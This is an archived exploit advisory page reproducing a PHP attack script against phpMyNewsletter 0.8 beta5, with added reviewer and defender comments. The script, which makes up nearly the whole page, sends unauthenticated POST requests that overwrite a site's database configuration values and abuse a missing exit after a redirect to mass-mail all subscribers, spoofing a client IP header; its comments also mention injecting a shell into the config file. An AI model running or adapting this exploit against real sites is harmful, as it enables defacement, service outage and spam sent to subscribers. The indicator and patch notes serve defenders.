
phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit

🗓️ 07 Apr 2007 00:00:00 | Reported by: Root | Type: seebug | Source: www.seebug.org | 👁 13 Views

phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit by BlackHawk

Code

                                                #!/usr/bin/php&nbsp;-q&nbsp;-d&nbsp;short_open_tag=on
<?
// Prints the banner, then prints the usage text and stops when too few arguments are given.
// NOTE(review): this listing is HTML-escaped as published (&nbsp; in place of spaces,
// backslash-escaped quotes), so it is not valid PHP in this form.
// The guard only requires $argc >= 3 (script name plus two arguments), although the usage
// text names Host, Path and AttackType and the script later reads $argv[3] and, for type 2,
// $argv[4] onward.
// The usage text offers two modes, overwriting config values and mailing every subscriber;
// no password or other credential is among the arguments.
echo&nbsp;\"
phpMyNewsletter&nbsp;<=&nbsp;0.8&nbsp;(beta5)&nbsp;Multiple&nbsp;Vuln&nbsp;Exploit
by&nbsp;BlackHawk&nbsp;<[email protected]>&nbsp;<http://itablackhawk.altervista.org>
Thanks&nbsp;to&nbsp;rgod&nbsp;for&nbsp;the&nbsp;php&nbsp;code&nbsp;and&nbsp;Marty&nbsp;for&nbsp;the&nbsp;Love

\";
if&nbsp;($argc<3)&nbsp;{
echo&nbsp;\"Usage:&nbsp;php&nbsp;\".$argv[0].\"&nbsp;Site&nbsp;AttackType&nbsp;Related
Host:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;server&nbsp;(ip/hostname)
Path:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;path&nbsp;of&nbsp;phpMyNewsletter
AttackType:&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;-&nbsp;>&nbsp;Delete&nbsp;Config&nbsp;Value&nbsp;(Rude&nbsp;Attack&nbsp;-&nbsp;can\'t&nbsp;do&nbsp;anything&nbsp;after)
			&nbsp;&nbsp;&nbsp;2&nbsp;-&nbsp;>&nbsp;Send&nbsp;an&nbsp;Email&nbsp;to&nbsp;all&nbsp;of&nbsp;the&nbsp;subscribers&nbsp;(Do&nbsp;not&nbsp;alter&nbsp;anything)
Related:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1&nbsp;-&nbsp;>&nbsp;None
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2&nbsp;-&nbsp;>&nbsp;OneWordTitle&nbsp;TextOfYourChoice
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Es:
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;php&nbsp;\".$argv[0].\"&nbsp;localhost&nbsp;/myphpnl/&nbsp;Newsletter_Hacked&nbsp;BlackHawk&nbsp;Got&nbsp;Your&nbsp;Newsletter
\";
die;
}

/*
Attack N°1
The vulnerable code is in index.php: the function that checks the login is at line 79,
but the code that changes the config file is at line 33, i.e. before the check runs.
If mq=off (magic_quotes_gpc disabled) you can inject a shell into the file.

Attack N°2

The vulnerable code is in send_mod.php at line 16:

if(!checkAdminAccess($conf->admin_pass, $form_pass))
     header("Location:index.php");

This is not a protection: header() only queues a redirect and does not stop the script,
so unless an exit follows it the rest of the file still runs and we can send a previously created newsletter.
In the same file there is also a function to add new newsletters,
so it works as a perfect spam-sender program.

BlackHawk <[email protected]>
*/
// Runtime settings for the whole run: error reporting is switched off, the execution
// time limit is set to 0 (no limit), and the default socket timeout is set to 5 seconds.
error_reporting(0);
ini_set(\"max_execution_time\",0);
ini_set(\"default_socket_timeout\",5);

// Build a two-part text dump of $string, one entry per byte.
//
// $exa collects each byte as two hex digits preceded by a separator (a leading 0 is
// added when dechex() yields a single digit). $result collects the byte itself when its
// code is in 33..126 and a dot otherwise, each preceded by two separators. After every
// 15 bytes a line break is appended to both strings.
// Returns $exa, a line break, then $result.
// The range test joins two comparisons with the bitwise | operator; on boolean operands
// the outcome is the same as a logical OR.
// Nothing in this listing calls quick_dump().
function&nbsp;quick_dump($string)
{
&nbsp;&nbsp;$result=\'\';$exa=\'\';$cont=0;
&nbsp;&nbsp;for&nbsp;($i=0;&nbsp;$i<=strlen($string)-1;&nbsp;$i++)
&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;if&nbsp;((ord($string[$i])&nbsp;<=&nbsp;32&nbsp;)&nbsp;|&nbsp;(ord($string[$i])&nbsp;>&nbsp;126&nbsp;))
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;.\";}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$result.=\"&nbsp;&nbsp;\".$string[$i];}
&nbsp;&nbsp;&nbsp;if&nbsp;(strlen(dechex(ord($string[$i])))==2)
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;else
&nbsp;&nbsp;&nbsp;{$exa.=\"&nbsp;0\".dechex(ord($string[$i]));}
&nbsp;&nbsp;&nbsp;$cont++;if&nbsp;($cont==15)&nbsp;{$cont=0;&nbsp;$result.=\"
\";&nbsp;$exa.=\"
\";}
&nbsp;&nbsp;}
&nbsp;return&nbsp;$exa.\"
\".$result;
}
// Pattern that sendpacketii() passes to preg_match() to validate an ip:port proxy string.
// NOTE(review): as published the pattern contains bare "d" and "." with no backslashes,
// presumably lost when the page was extracted; in that form "d" is the literal letter,
// so a numeric ip:port value would not match. The outer parentheses would be read by
// preg_match() as the pattern delimiters.
$proxy_regex&nbsp;=&nbsp;\'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\';
// Send one raw request over a TCP socket and collect the reply.
//
// Reads the globals $proxy, $host, $port and $proxy_regex and writes the response text
// into the global $html; nothing is returned.
//  - $proxy empty: resolves $host with gethostbyname(), connects to $port, writes $packet
//    and reads with fgets() until end of stream.
//  - $proxy set: checks it against $proxy_regex, splits it on ":" into address and port,
//    connects there, writes $packet and reads one byte at a time; that loop keeps going
//    while the stream is not at EOF or the CR LF CR LF sequence has not yet appeared in $html.
// A failed connection or a proxy string that does not match prints a message and ends the
// script with die.
// $proxy is assigned an empty string at top level in this listing, so only the direct
// branches run here.
// eregi() was removed in PHP 7.0, so the proxy read loop cannot run on current PHP.
function&nbsp;sendpacketii($packet)
{
&nbsp;&nbsp;global&nbsp;$proxy,&nbsp;$host,&nbsp;$port,&nbsp;$html,&nbsp;$proxy_regex;
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen(gethostbyname($host),$port);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;\'.$host.\':\'.$port;&nbsp;die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
	$c&nbsp;=&nbsp;preg_match($proxy_regex,$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$c)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'Not&nbsp;a&nbsp;valid&nbsp;proxy...\';die;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;$parts=explode(\':\',$proxy);
&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"Connecting&nbsp;to&nbsp;\".$parts[0].\":\".$parts[1].\"&nbsp;proxy...
\";
&nbsp;&nbsp;&nbsp;&nbsp;$ock=fsockopen($parts[0],$parts[1]);
&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(!$ock)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\'No&nbsp;response&nbsp;from&nbsp;proxy...\';die;
	}
&nbsp;&nbsp;}
&nbsp;&nbsp;fputs($ock,$packet);
&nbsp;&nbsp;if&nbsp;($proxy==\'\')&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fgets($ock);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;else&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;$html=\'\';
&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;((!feof($ock))&nbsp;or&nbsp;(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html.=fread($ock,1);
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;}
&nbsp;&nbsp;fclose($ock);
}

// Run parameters. Host, path and attack type are taken from the command line as given;
// the port is fixed to 80 and the proxy is left empty, so connections are direct.
// The path check requires "/" as both first and last character (<> is PHP's alternative
// not-equal operator); otherwise an error is printed and the script ends.
// $p is the request target: the bare path when no proxy is set, otherwise an absolute
// http:// URL built from host, port and path.
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy=\"\";

if&nbsp;(($path[0]<>\'/\')&nbsp;or&nbsp;($path[strlen($path)-1]<>\'/\'))&nbsp;{echo&nbsp;\'Error...&nbsp;check&nbsp;the&nbsp;path!\';&nbsp;die;}
if&nbsp;($proxy==\'\')&nbsp;{$p=$path;}&nbsp;else&nbsp;{$p=\'http://\'.$host.\':\'.$port.$path;}


// Dispatch on the AttackType argument; values other than 1 or 2 match no case and nothing
// is sent. Neither branch puts a password or session value into its requests.
//
// case 1: one POST to admin/index.php?op=saveGlobalconfig whose body sets db_host, db_login,
//   db_pass, db_name and table_config to the literal "hacked" (plus file=1). The header
//   comment of this script attributes the flaw to index.php reaching its config-saving code
//   before its login check.
// case 2: a POST to admin/send_mod.php creating a newsletter (subject, message, format=html,
//   list_id=1); the text after the first "Location: " in the response, up to the next line
//   break, is then requested under admin/ with a GET. That value is used exactly as the
//   server returned it. The GET request and the final response are echoed to the console.
//
// Defender notes, read off the requests built below:
//  - Every request is HTTP/1.0 and carries "CLIENT-IP: 999.999.999.999", which is not a valid
//    IPv4 address, together with a fixed MSIE 6.0 User-Agent; the POSTs also send
//    "Accept-Language: it". Where request headers are logged these are usable indicators.
//  - Subject and message are suffixed with " - Send With BlackHawk Exploit -", a string to
//    search for in newsletters created or mailed by an affected install.
//  - Application-side fix: verify admin access before acting on any request under admin/, and
//    end the script (exit) immediately after the redirect issued on a failed check. Until an
//    install is patched, putting admin/ behind web-server authentication closes both paths.
switch($attack_type)
{
case&nbsp;1:&nbsp;//Config.php&nbsp;values&nbsp;delete
echo&nbsp;\"&nbsp;-&nbsp;Executing&nbsp;Task..
\";
$data=\"file=1&db_host=hacked&db_login=hacked&db_pass=hacked&db_name=hacked&table_config=hacked\";
$packet=\"POST&nbsp;\".$p.\"admin/index.php?op=saveGlobalconfig&nbsp;HTTP/1.0
\";
$packet.=\"CLIENT-IP:&nbsp;999.999.999.999
\";//spoof
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*&nbsp;/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"
\";
$packet.=\"Accept-Language:&nbsp;it
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"Accept-Encoding:&nbsp;gzip,&nbsp;deflate
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
$packet.=\"Connection:&nbsp;Close
\";
$packet.=\"Cache-Control:&nbsp;no-cache

\";
$packet.=$data;
sendpacketii($packet);
echo&nbsp;\"&nbsp;-&nbsp;All&nbsp;done..&nbsp;^_^
\";
break;

case&nbsp;2:&nbsp;//Send&nbsp;NewsLetter
$title=$argv[4];
$txt=\'\';
for&nbsp;($i=5;&nbsp;$i<=$argc-1;&nbsp;$i++){
$txt.=\"&nbsp;\".$argv[$i];
}
echo&nbsp;\"&nbsp;-&nbsp;Executing&nbsp;Task&nbsp;1&nbsp;(Creating&nbsp;Newsletter)
\";
$data=\"subject=\".urlencode($title.\'&nbsp;-&nbsp;Send&nbsp;With&nbsp;BlackHawk&nbsp;Exploit&nbsp;-\').\"&message=\".urlencode($txt.\'<br><br>&nbsp;-&nbsp;Send&nbsp;With&nbsp;BlackHawk&nbsp;Exploit&nbsp;-\').\"&format=html&list_id=1\";
$packet=\"POST&nbsp;\".$p.\"admin/send_mod.php&nbsp;HTTP/1.0
\";
$packet.=\"CLIENT-IP:&nbsp;999.999.999.999
\";//spoof
$packet.=\"Accept:&nbsp;image/gif,&nbsp;image/x-xbitmap,&nbsp;image/jpeg,&nbsp;image/pjpeg,&nbsp;application/x-shockwave-flash,&nbsp;*&nbsp;/*
\";
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"
\";
$packet.=\"Accept-Language:&nbsp;it
\";
$packet.=\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
$packet.=\"Accept-Encoding:&nbsp;gzip,&nbsp;deflate
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Content-Length:&nbsp;\".strlen($data).\"
\";
$packet.=\"Connection:&nbsp;Close
\";
$packet.=\"Cache-Control:&nbsp;no-cache

\";
$packet.=$data;
sendpacketii($packet);
echo&nbsp;\"&nbsp;-&nbsp;Retrieving&nbsp;MsgID..
\";
$temp=&nbsp;explode(\'Location:&nbsp;\',&nbsp;$html);
$x&nbsp;=&nbsp;explode(\"
\",&nbsp;$temp[1]);
$url_msgid=$x[0];
echo&nbsp;\"&nbsp;-&nbsp;Sending&nbsp;The&nbsp;EMail..
\";

$packet=\"GET&nbsp;\".$p.\"admin/$url_msgid&nbsp;HTTP/1.0
\";
$packet.=\"CLIENT-IP:&nbsp;999.999.999.999
\";//spoof
$packet.=\"Referer:&nbsp;http://\".$host.$path.\"
\";
$packet.=\"User-Agent:&nbsp;Mozilla/4.0&nbsp;(compatible;&nbsp;MSIE&nbsp;6.0;&nbsp;Windows&nbsp;NT&nbsp;5.1;&nbsp;SV1)
\";
$packet.=\"Host:&nbsp;\".$host.\"
\";
$packet.=\"Connection:&nbsp;Close
\";
echo&nbsp;$packet;
sendpacketii($packet);
echo&nbsp;\"&nbsp;-&nbsp;Email&nbsp;Sent
\";
echo&nbsp;$html;
}
?>

07 Apr 2007 00:00 — Current
7.1 — High risk
Vulners AI Score: 7.1